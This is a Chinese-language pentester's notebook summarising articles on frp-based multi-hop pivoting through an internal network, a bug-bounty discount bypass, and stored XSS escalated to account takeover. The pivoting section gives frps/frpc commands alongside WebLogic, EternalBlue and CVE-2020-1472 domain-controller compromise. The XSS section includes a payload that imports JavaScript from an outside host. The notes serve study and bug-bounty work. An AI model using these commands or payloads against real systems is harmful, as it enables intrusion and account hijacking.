随手记

一、JS加解密之mitmproxy联动Burp全自动加解密数据包

  1. 编写脚本就可以自动化对输入输出进行解密

二、内网渗透--轻松玩转多级代理

  1. 利用frp搭建多级代理

    1. 第一层代理: vps启动服务端:./frps -p 9999 在入口机器作为客户端,启动frpc,frpc客户端

    2. 第二层代理 通过fscan扫描,获取到一台机器为双网卡,且存在weblogic漏洞,通过weblogic漏洞获取到主机权限,对10段进行信息收集,发现另一张双网卡机器,且存在永恒之蓝。 接下来就是通过代理去打10.10.10.20.7这个永恒之蓝

      入口机上操作:frps.exe --bind_addr 192.168.225.144 --bind_port 9999

      启动frpc客户端,这里可以仔细对比一下第一层代理的配置文件,删除了plugin=socks5功能,增加了local_ip和local_port参数。 frpc.exe tcp --local_ip 192.168.225.144 --local_port 8888 --server_addr 1.1.1.1:9999 --remote_port 7777

      weblogic机器上操作:frpc.exe -c frpc.ini

      成功访问到10.10.20.7机器,通过msf成功获取到该权限,且该机器存在于域环境中:域控地址为10.10.10.8,当前代理不可达。

    3. 第三层代理拿下域控

      weblogic机器上操作(启动frps服务端):frps.exe --bind_addr 10.10.20.12 --bind_port 9999

      启动frp客户端:frpc.exe tcp --local_ip 10.10.20.12 --local_port 6666 --server_addr 192.168.225.144:9999 --remote_port 8888

      ms17010机器上操作:frpc.exe -c frpc.ini

      cve-2020-1472拿下域控

  2. 利用Stowaway搭建多级代理

    https://github.com/ph4ntonn/Stowaway

三、前端JS加密与Buspsuite的坦诚相待

四、Ghauri:一款功能强大的SQL注入漏洞自动化检测和利用工具

五、【赏金猎人】折扣政策绕过漏洞

  1. 拦截数据包查看响应,修改响应的状态为1。价格变优惠。

六、在一个Web网站中获得$7000赏金奖励

  1. GAP插件对某个特定域进行参数提取,然后使用X8进行参数发现,最终发现一个使用了addon参数的反射型XSS:

  2. 目标的网站中,用户可以提供出售或免费的插件,并且拥有一个可以让用户评价插件的评论功能,而在评论功能中,小哥发现了一处存储型XSS漏洞:

    form><button formaction="javascript:import('//ayrix.info/exploit/[email protected]')">Click Me</button></form>
    
    1. 为了提高漏洞影响,小哥尝试将这个 XSS 升级为帐户接管
    2. 在忘记密码功能时他编写了一个JS利用代码来尝试修改受害者的电子邮件(但由于忘记密码功能仅在 SSO 域内可用,因此,白帽小哥可以更改受害者的电子邮件地址,但却无法重置密码。)
    3. 于是小哥尝试模糊测试,终于在XSS域上发现了一个名为legacy-login的隐藏路径
    4. 小哥开始检查Burp Suite中的请求信息,他发现电子邮件的开头和结尾部分有两个空格,他尝试删除空格然后重新提交请求
    5. 成功收到电子邮件!
  3. 存储XSS导致账户劫持(2)

    1. 白帽小哥在网站上创建了一个插件,并在其中一个描述页面上成功执行了上述的PoC代码。